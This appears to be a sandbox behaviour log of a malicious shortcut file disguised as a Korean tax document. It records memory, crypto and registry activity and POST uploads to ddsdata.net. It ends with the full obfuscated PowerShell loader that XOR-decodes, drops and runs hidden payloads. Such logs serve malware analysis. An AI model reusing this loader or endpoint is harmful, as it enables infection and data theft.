buffer: che esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt print
console_handle: 0x0000020f
1 1 0

WriteConsoleW

buffer: maker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheob
console_handle: 0x0000021b
1 1 0

WriteConsoleW

buffer: ronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenc
console_handle: 0x00000227
1 1 0

WriteConsoleW

buffer: ed shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuro
console_handle: 0x00000233
1 1 0

WriteConsoleW

buffer: id#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zapt
console_handle: 0x0000023f
1 1 0

WriteConsoleW

buffer: iahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement
console_handle: 0x0000024b
1 1 0

WriteConsoleW

buffer: periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship
console_handle: 0x00000257
1 1 0

WriteConsoleW

buffer: slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;
console_handle: 0x00000263
1 1 0

WriteConsoleW

buffer: At line:1 char:2454
console_handle: 0x0000027b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375bd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375bd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375bd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376498
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00375d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00376998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0563dd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0563dd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0563dd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0563dd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004f5540
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://ddsdata.net/upload.php
request POST http://ddsdata.net/upload.php
request POST http://ddsdata.net/upload.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0227b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02277000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02212000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02275000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0227c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02213000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02214000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02215000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02216000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02217000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02218000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02219000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ae000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029af000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13324091392
free_bytes_available: 13324091392
root_path: C:\Users\test22\downloads
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13324087296
free_bytes_available: 13324087296
root_path: C:\Users\test22\documents
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13324087296
free_bytes_available: 13324087296
root_path: C:\Users\test22\desktop
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk
file C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk
file C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\Public\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM;
